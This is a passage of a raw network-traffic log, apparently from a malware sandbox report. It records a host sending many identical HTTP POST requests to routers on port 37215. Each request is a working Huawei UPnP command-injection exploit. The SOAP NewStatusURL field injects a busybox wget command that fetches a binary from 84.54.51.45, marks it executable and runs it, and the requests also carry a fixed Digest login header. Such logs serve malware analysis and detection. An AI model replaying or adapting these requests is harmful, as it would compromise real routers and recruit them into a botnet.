2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1162192.168.2.155860041.132.144.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175086975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1163192.168.2.156009441.247.231.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175107002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1164192.168.2.155575441.131.231.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175180912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1165192.168.2.153358641.214.56.137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175185919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1166192.168.2.154081641.65.18.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175189972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1167192.168.2.154502641.55.38.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175215960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1168192.168.2.154505641.157.60.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175245047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1169192.168.2.155660841.149.213.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175273895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1170192.168.2.155385041.171.118.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175297976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1171192.168.2.153745641.183.53.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175323009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1172192.168.2.155213841.111.103.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.175345898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
